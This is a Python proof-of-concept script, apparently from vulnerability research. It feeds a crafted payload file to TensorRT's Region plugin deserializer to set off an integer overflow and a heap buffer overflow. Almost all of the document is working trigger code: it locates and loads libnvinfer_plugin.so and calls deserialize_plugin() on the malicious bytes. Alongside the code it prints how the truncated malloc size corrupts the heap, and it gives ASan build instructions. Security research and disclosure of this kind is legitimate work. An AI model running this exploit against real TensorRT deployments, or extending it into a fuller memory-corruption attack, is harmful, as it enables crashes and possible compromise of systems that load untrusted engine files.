| |
| """ |
| Trigger TensorRT Region plugin heap overflow via deserialize_plugin(). |
| |
| This script loads a malicious serialized payload and feeds it to |
| RegionPluginCreator.deserialize_plugin(), which internally calls |
| Region::Region(buffer, length) — the vulnerable deserialization constructor. |
| |
| Requirements: |
| - TensorRT Python package (pip install tensorrt) |
| - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source |
| https://github.com/NVIDIA/TensorRT |
| |
| For ASan detection, build the OSS plugins with: |
| cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address" |
| make -j$(nproc) nvinfer_plugin |
| |
| Usage: |
| python3 gen_payload.py # generates malicious_region_payload.bin |
| python3 trigger_deserialize.py # triggers the heap overflow |
| """ |
| import ctypes |
| import struct |
| import sys |
| import os |
| import glob |
|
|
| def find_and_load_plugin_lib(): |
| """Try to find and load libnvinfer_plugin.so with OSS plugins.""" |
| search_paths = [ |
| |
| "TensorRT/build/out/libnvinfer_plugin.so", |
| "/content/TRT/build/out/libnvinfer_plugin.so", |
| |
| "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so", |
| ] |
| |
| |
| for p in os.environ.get("LD_LIBRARY_PATH", "").split(":"): |
| if p: |
| search_paths.append(os.path.join(p, "libnvinfer_plugin.so")) |
| |
| for path in search_paths: |
| for match in glob.glob(path): |
| if os.path.exists(match): |
| return match |
| return None |
|
|
| def main(): |
| payload_file = "malicious_region_payload.bin" |
| if len(sys.argv) > 1: |
| payload_file = sys.argv[1] |
| |
| if not os.path.exists(payload_file): |
| print(f"[-] {payload_file} not found. Run gen_payload.py first.") |
| sys.exit(1) |
| |
| with open(payload_file, "rb") as f: |
| payload = f.read() |
| print(f"[+] Loaded {payload_file}: {len(payload)} bytes") |
| |
| |
| try: |
| import tensorrt as trt |
| print(f"[+] TensorRT {trt.__version__}") |
| except ImportError: |
| print("[-] TensorRT Python package not found. Install with: pip install tensorrt") |
| sys.exit(1) |
| |
| |
| plugin_path = find_and_load_plugin_lib() |
| if plugin_path: |
| print(f"[+] Loading plugin lib: {plugin_path}") |
| ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL).initLibNvInferPlugins(None, b'') |
| else: |
| print("[!] OSS plugin library not found, trying default registry...") |
| |
| |
| region_creator = None |
| for c in trt.get_plugin_registry().all_creators: |
| if c.name == "Region_TRT": |
| region_creator = c |
| break |
| |
| if not region_creator: |
| print("[-] Region_TRT plugin not found in registry.") |
| print(" Build TensorRT OSS plugins first:") |
| print(" git clone https://github.com/NVIDIA/TensorRT.git") |
| print(" cd TensorRT && mkdir build && cd build") |
| print(" cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF") |
| print(" make -j$(nproc) nvinfer_plugin") |
| sys.exit(1) |
| |
| print(f"[+] Region_TRT v{region_creator.plugin_version}") |
| |
| |
| if len(payload) >= 32: |
| C, H, W, num, classes, coords = struct.unpack_from("<6i", payload, 0) |
| flags = list(payload[24:32]) |
| print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}") |
| print(f"[*] Flags: softmaxTree={flags[0]} leaf={flags[1]}") |
| if len(payload) >= 36: |
| n_val = struct.unpack_from("<i", payload, 32)[0] |
| print(f"[*] smTreeTemp->n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})") |
| print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{(n_val * 4) & 0xFFFFFFFF:08x} (truncated)") |
| |
| print() |
| print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...") |
| print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow") |
| print("[!] Expected: heap-buffer-overflow (visible with ASan)") |
| print() |
| |
| try: |
| bad_plugin = region_creator.deserialize_plugin("region", payload) |
| print(f"[+] Plugin deserialized (returned: {bad_plugin})") |
| print("[!] Without ASan, the heap overflow is silent but corruption has occurred.") |
| print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.") |
| except Exception as e: |
| print(f"[!] Exception during deserialization: {e}") |
|
|
| if __name__ == "__main__": |
| main() |
|
|